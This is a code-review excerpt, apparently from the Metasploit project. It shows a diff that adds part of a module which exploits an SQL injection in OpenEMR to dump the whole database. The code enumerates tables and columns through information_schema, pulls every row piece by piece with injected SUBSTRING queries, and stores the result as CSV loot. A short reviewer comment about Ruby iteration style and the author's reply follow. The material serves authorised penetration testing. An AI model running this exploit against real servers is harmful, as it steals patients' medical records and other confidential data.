modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb

```diff
@@ -0,0 +1,243 @@
+    elsif where_clause.empty? && !not_in_clause.empty?
+      where_clause = 'WHERE ' + not_in_clause
+    elsif !where_clause.empty? && not_in_clause.empty?
+      where_clause = 'WHERE ' + where_clause
+    end
+    where_clause
+  end
+
+  def fetch_complete(column_name, table_name, where_condition, not_in_clause)
+    offset = 0
+    reconstructed_value = ''
+    loop do
+      where_clause = complete_where_clause(where_condition, not_in_clause)
+      payload = "SELECT SUBSTRING(#{column_name}, #{(offset * 31) + 1}) FROM #{table_name} #{where_clause} LIMIT 1"
+      value = exec_payload_and_parse(payload)
+      reconstructed_value += value unless value.nil?
+      break if value.nil? || value.empty? || value.length < 31
+
+      offset += 1
+    end
+    reconstructed_value
+  end
+
+  def enumerate_iteratively(column_name, table_name, where_condition)
+    values = []
+
+    loop do
+      values_sql_string = "'" + values.join("','") + "'"
+      not_in_clause = values.empty? ? '' : "#{column_name} NOT IN (#{values_sql_string})"
+      value = fetch_complete(column_name, table_name, where_condition, not_in_clause)
+      break if value.nil? || value.empty?
+
+      values.push(value)
+    end
+    values
+  end
+
+  def enumerate_tables
+    enumerate_iteratively('table_name',
+                          'information_schema.TABLES',
+                          '')
+  end
+
+  def enumerate_columns(table)
+    enumerate_iteratively('column_name',
+                          'information_schema.COLUMNS',
+                          "table_name = '#{table}'")
+  end
+
+  def find_primary_key(table)
+    fetch_complete('column_name',
+                   'information_schema.KEY_COLUMN_USAGE',
+                   "table_name = '#{table}' AND CONSTRAINT_NAME ='PRIMARY'",
+                   '')
+  end
+
+  def walk_table(table)
+    primary_key = find_primary_key(table)
+    return if primary_key.nil?
+
+    columns = enumerate_columns(table)
+    key_values = enumerate_iteratively(primary_key,
+                                       table,
+                                       '')
+
+    data = [columns]
+    key_values.each do |key_value|
+      row = []
+      columns.each do |column|
+        where_condition = "#{primary_key} = #{key_value}"
+        value = fetch_complete(column, table, where_condition, '')
+        row.append(value)
+      end
+      data.append(row)
+    end
+    data
+  end
+
+  def save_csv(data, filename)
+    store_loot(
+      'openemr.database.dump',
+      'application/CSV',
+      rhost,
+      data,
+      filename
+    )
+  end
+
+  def dump_all
+    payload = 'version()'
+    db_version = exec_payload_and_parse(payload)
+    print_status("DB Version: #{db_version}")
+    print_status('Enumerating tables, this may take a moment...')
+    tables = enumerate_tables
+    num_tables = tables.length
+    print_status("Identified #{num_tables} tables.")
+
+    count = 1
```

Comment:
Rather than manually keep a count of the tables, you could use `each_with_index` (although you'll have to `+1` in each instance, as it starts at the zeroeth index.)

```
irb(main):001:0> ['asdf', 'zxcv'].each_with_index {|v,i| puts "#{i}: #{v}"}
0: asdf
1: zxcv
=> ["asdf", "zxcv"]
irb(main):002:0> 
```

Reply:
This is addressed in the latest commit.